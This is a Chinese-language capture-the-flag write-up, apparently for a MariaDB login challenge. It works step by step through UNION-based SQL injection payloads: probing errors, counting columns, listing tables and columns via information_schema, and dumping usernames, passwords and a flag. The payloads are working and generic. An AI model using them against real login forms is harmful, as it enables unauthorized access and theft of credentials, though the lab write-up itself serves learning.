123',发现两个框都有sql注入问题You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123''' at line 1
123'; database() #
返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database() #'' at line 1
说明不能使用堆叠注入这么搞
123' union select 1 #
返回
The used SELECT statements have a different number of columns
123' union select 1,2,3 #
返回
Login Success!
Hello 2!
Your password is '3'
说明展示的是查询的第二个字段和和第三个字段
123' union select 1,database(),3 #
返回
Hello geek!
Your password is '3'
成功之道数据库叫 geek
# 这里写不行,3 放到最后会爆语法错误
123' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database(),3 #
# 这样写ok,把子查询放到最后
123' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database() #
返回
Hello 2!
Your password is 'geekuser,l0ve1ysq1'
l0ve1ysq1,开始爆该表的字段123' union select 1,2, group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
返回
Hello 2!
Your password is 'id,username,password'
123' union select id,username,password from l0ve1ysq1 limit 1 #
123' union select id,username,password from l0ve1ysq1 limit 2,1 #
返回
Hello cl4y!
Your password is 'wo_tai_nan_le'
说明这么搞ok
# 这样也ok,但是有点慢
123' union select id,username,password from l0ve1ysq1 limit 2,1 #
# 这样更ok,快一点
123' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
返回
Hello 2!
Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{172a03e1-ad34-4139-8e61-8cb1c747e4a8}'